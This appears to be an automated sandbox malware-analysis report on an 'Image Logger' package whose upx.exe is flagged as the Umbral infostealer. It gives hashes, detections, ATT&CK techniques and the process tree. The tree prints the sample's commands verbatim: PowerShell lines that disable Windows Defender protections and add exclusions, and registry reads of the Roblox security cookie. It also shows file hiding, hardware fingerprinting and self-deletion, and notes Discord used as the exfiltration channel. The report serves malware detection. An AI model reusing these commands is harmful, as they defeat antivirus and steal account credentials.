Overview
overview
10Static
static
10Image Logg...up.bat
windows7-x64
10Image Logg...up.bat
windows10-2004-x64
10Image Logg...px.exe
windows7-x64
10Image Logg...px.exe
windows10-2004-x64
10Image Logg...in.exe
windows7-x64
7Image Logg...in.exe
windows10-2004-x64
7main.pyc
windows7-x64
3main.pyc
windows10-2004-x64
3Image Logg...rt.bat
windows7-x64
10Image Logg...rt.bat
windows10-2004-x64
10Analysis
-
max time kernel
94s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
11-09-2024 20:28
Behavioral task
behavioral1
Sample
Image Logger/Setup.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Image Logger/Setup.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Image Logger/Src/Files/upx.exe
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
Image Logger/Src/Files/upx.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Image Logger/Src/main.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
Image Logger/Src/main.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
main.pyc
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
main.pyc
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Image Logger/Start.bat
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Image Logger/Start.bat
Resource
win10v2004-20240802-en
General
-
Target
Image Logger/Src/Files/upx.exe
-
Size
229KB
-
MD5
3191f1be1378fe37eb86efe885252351
-
SHA1
e242bc1a4a1b09dc0936a966153449a7afd227ff
-
SHA256
d5e77c60ebc90e48aa63369619fb8a048867aa1820c119371fb89d3b707324fc
-
SHA512
f2e9f3bbc4456034a0d233f0aca93de4fd5177e028d8f3208248457bc061574ac1a3615e565ca9d54cf41f68df6ac6f03b44c0dbaae0f56cc569440f67af204a
-
SSDEEP
6144:FloZM+rIkd8g+EtXHkv/iD4o+7Cw7ByallgRj++74T7b8e1mA9i:HoZtL+EP8V7Cw7ByallgRj++74DVU
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral4/memory/4336-1-0x000002C8658E0000-0x000002C865920000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 208 powershell.exe 3076 powershell.exe 3932 powershell.exe 4540 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts upx.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 discord.com 17 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3148 cmd.exe 4496 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2312 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4496 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4336 upx.exe 208 powershell.exe 208 powershell.exe 3076 powershell.exe 3076 powershell.exe 3932 powershell.exe 3932 powershell.exe 4076 powershell.exe 4076 powershell.exe 4540 powershell.exe 4540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4336 upx.exe Token: SeIncreaseQuotaPrivilege 2296 wmic.exe Token: SeSecurityPrivilege 2296 wmic.exe Token: SeTakeOwnershipPrivilege 2296 wmic.exe Token: SeLoadDriverPrivilege 2296 wmic.exe Token: SeSystemProfilePrivilege 2296 wmic.exe Token: SeSystemtimePrivilege 2296 wmic.exe Token: SeProfSingleProcessPrivilege 2296 wmic.exe Token: SeIncBasePriorityPrivilege 2296 wmic.exe Token: SeCreatePagefilePrivilege 2296 wmic.exe Token: SeBackupPrivilege 2296 wmic.exe Token: SeRestorePrivilege 2296 wmic.exe Token: SeShutdownPrivilege 2296 wmic.exe Token: SeDebugPrivilege 2296 wmic.exe Token: SeSystemEnvironmentPrivilege 2296 wmic.exe Token: SeRemoteShutdownPrivilege 2296 wmic.exe Token: SeUndockPrivilege 2296 wmic.exe Token: SeManageVolumePrivilege 2296 wmic.exe Token: 33 2296 wmic.exe Token: 34 2296 wmic.exe Token: 35 2296 wmic.exe Token: 36 2296 wmic.exe Token: SeIncreaseQuotaPrivilege 2296 wmic.exe Token: SeSecurityPrivilege 2296 wmic.exe Token: SeTakeOwnershipPrivilege 2296 wmic.exe Token: SeLoadDriverPrivilege 2296 wmic.exe Token: SeSystemProfilePrivilege 2296 wmic.exe Token: SeSystemtimePrivilege 2296 wmic.exe Token: SeProfSingleProcessPrivilege 2296 wmic.exe Token: SeIncBasePriorityPrivilege 2296 wmic.exe Token: SeCreatePagefilePrivilege 2296 wmic.exe Token: SeBackupPrivilege 2296 wmic.exe Token: SeRestorePrivilege 2296 wmic.exe Token: SeShutdownPrivilege 2296 wmic.exe Token: SeDebugPrivilege 2296 wmic.exe Token: SeSystemEnvironmentPrivilege 2296 wmic.exe Token: SeRemoteShutdownPrivilege 2296 wmic.exe Token: SeUndockPrivilege 2296 wmic.exe Token: SeManageVolumePrivilege 2296 wmic.exe Token: 33 2296 wmic.exe Token: 34 2296 wmic.exe Token: 35 2296 wmic.exe Token: 36 2296 wmic.exe Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 3076 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeIncreaseQuotaPrivilege 4860 wmic.exe Token: SeSecurityPrivilege 4860 wmic.exe Token: SeTakeOwnershipPrivilege 4860 wmic.exe Token: SeLoadDriverPrivilege 4860 wmic.exe Token: SeSystemProfilePrivilege 4860 wmic.exe Token: SeSystemtimePrivilege 4860 wmic.exe Token: SeProfSingleProcessPrivilege 4860 wmic.exe Token: SeIncBasePriorityPrivilege 4860 wmic.exe Token: SeCreatePagefilePrivilege 4860 wmic.exe Token: SeBackupPrivilege 4860 wmic.exe Token: SeRestorePrivilege 4860 wmic.exe Token: SeShutdownPrivilege 4860 wmic.exe Token: SeDebugPrivilege 4860 wmic.exe Token: SeSystemEnvironmentPrivilege 4860 wmic.exe Token: SeRemoteShutdownPrivilege 4860 wmic.exe Token: SeUndockPrivilege 4860 wmic.exe Token: SeManageVolumePrivilege 4860 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 4336 wrote to memory of 2296 4336 upx.exe 85 PID 4336 wrote to memory of 2296 4336 upx.exe 85 PID 4336 wrote to memory of 3644 4336 upx.exe 90 PID 4336 wrote to memory of 3644 4336 upx.exe 90 PID 4336 wrote to memory of 208 4336 upx.exe 92 PID 4336 wrote to memory of 208 4336 upx.exe 92 PID 4336 wrote to memory of 3076 4336 upx.exe 96 PID 4336 wrote to memory of 3076 4336 upx.exe 96 PID 4336 wrote to memory of 3932 4336 upx.exe 98 PID 4336 wrote to memory of 3932 4336 upx.exe 98 PID 4336 wrote to memory of 4076 4336 upx.exe 100 PID 4336 wrote to memory of 4076 4336 upx.exe 100 PID 4336 wrote to memory of 4860 4336 upx.exe 103 PID 4336 wrote to memory of 4860 4336 upx.exe 103 PID 4336 wrote to memory of 4588 4336 upx.exe 105 PID 4336 wrote to memory of 4588 4336 upx.exe 105 PID 4336 wrote to memory of 960 4336 upx.exe 107 PID 4336 wrote to memory of 960 4336 upx.exe 107 PID 4336 wrote to memory of 4540 4336 upx.exe 109 PID 4336 wrote to memory of 4540 4336 upx.exe 109 PID 4336 wrote to memory of 2312 4336 upx.exe 112 PID 4336 wrote to memory of 2312 4336 upx.exe 112 PID 4336 wrote to memory of 3148 4336 upx.exe 116 PID 4336 wrote to memory of 3148 4336 upx.exe 116 PID 3148 wrote to memory of 4496 3148 cmd.exe 118 PID 3148 wrote to memory of 4496 3148 cmd.exe 118 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3644 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe"C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe"2⤵
- Views/modifies file attributes
PID:3644
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:4588
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4540
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2312
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4496
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
948B
MD5966914e2e771de7a4a57a95b6ecfa8a9
SHA17a32282fd51dd032967ed4d9a40cc57e265aeff2
SHA25698d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba
SHA512dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5
-
Filesize
1KB
MD588be3bc8a7f90e3953298c0fdbec4d72
SHA1f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA5124fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c
-
Filesize
1KB
MD5d4a2f28ade8dd97f0adb0f71cc027c2d
SHA1204f23cd6e8afb444711b24a77e5ad12a215042f
SHA256feb979bbc240009176d8263f786083ea987071229008d0fdca424404b00d06ea
SHA512729b70695712a6a19d6c5428a8dcab04acc4f8af61f620d5b049459a7c643c0d081b585beedca10d97a3ffa208106e48b5e2719972f31b695ed1956d7eff155a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82